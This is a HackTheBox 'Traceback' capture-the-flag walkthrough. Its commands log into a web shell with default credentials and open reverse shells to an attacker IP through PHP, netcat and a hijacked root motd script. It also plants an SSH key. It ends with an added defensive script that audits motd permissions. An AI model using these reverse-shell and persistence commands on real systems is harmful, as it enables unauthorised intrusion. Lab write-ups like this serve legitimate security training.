HackTheBox - Traceback | Walkthrough

Enumeration
vi /etc/hosts
10.10.10.181 traceback
nmap -A 10.10.10.181 -oN traceback/nmap
ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
httpd Apache httpd 2.4.29
Search Google for the comment "some of the best web shells that you might need".
http://traceback/smevk.php
This leads to a login page. Log in with:
admin/admin
On your attacker machine,
vi rev.php
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.86/4444 0>&1'");
Upload the file and then set up a netcat listener in your attacker machine:
nc -nvlp 4444
Send a request to traceback/rev.php.
You should have a reverse shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
cd ~
cat note.txt
sudo -l
You will see where the file is.
User
Now, you can execute a shell command to get a reverse shell back on your machine.
On your attacker machine,
nc -nvlp 1234
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.114 1234 >/tmp/f")'
Now, you should get a reverse shell.
Now, set up SSH access to the machine.
On your attacker machine:
(printf '\n\n'; cat ~/.ssh/id_rsa.pub; printf '\n\n') > ~/hackthebox/traceback/www/test.txt
python -m SimpleHTTPServer
As webadmin,
cd ~/.ssh
wget http://10.10.14.114:8000/test.txt
cat test.txt >> authorized_keys
rm test.txt
Root
For privesc,
ps aux | grep root
You should see that root is replacing the /etc/update-motd.d/ files every 30 seconds.
ls -al /etc/update-motd.d/
You can see that you have write and execute privileges on these files.
The 00-header file is displayed every time you ssh into this box.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.114 2345 >/tmp/f" >> /etc/update-motd.d/00-header
Now, on your attacking machine, you will need two windows.
In one, run:
nc -nvlp 2345
This is so that you can catch the reverse shell that gets sent when the 00-header file runs.
In the other tab:
ssh webadmin@10.10.10.181
And boom, you should get a reverse shell as root!
whoami
cat ~/root.txt
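
The root step above works only because the scripts in /etc/update-motd.d/ can be modified by a non-root user. A defender-side audit for that condition, as an added example that is not part of the original walkthrough (the function name audit_motd_dir and its arguments are assumptions made for this example):

```shell
#!/bin/sh
# Added example: flag login-banner scripts that a non-root account could modify.
# The walkthrough shows /etc/update-motd.d/00-header running as root at SSH
# login, so any write access for other users there is a privilege-escalation path.

# audit_motd_dir DIR [OWNER_UID]   (hypothetical helper for this example)
# Prints every file or directory under DIR that is group-writable,
# world-writable, or not owned by OWNER_UID (default 0, i.e. root).
# Returns 0 if the tree is clean, 1 if anything was flagged, 2 on bad input.
audit_motd_dir() {
    dir=$1
    owner=${2:-0}
    if [ ! -d "$dir" ]; then
        echo "audit_motd_dir: $dir is not a directory" >&2
        return 2
    fi
    # -perm -020 / -perm -002 match the group-write and other-write bits.
    # The directory itself is included: write access to it allows a script
    # to be replaced even when the script's own mode is strict.
    findings=$(find "$dir" \( -type f -o -type d \) \
        \( -perm -020 -o -perm -002 -o ! -user "$owner" \) \
        -exec ls -ld {} \;)
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Run against a directory when one is given on the command line, e.g.
#   sh audit_motd.sh /etc/update-motd.d
if [ "$#" -gt 0 ]; then
    audit_motd_dir "$@"
fi
```

A non-zero exit status makes the check usable from cron or a configuration-management run; the fix for each flagged path is root ownership with mode 755 or stricter.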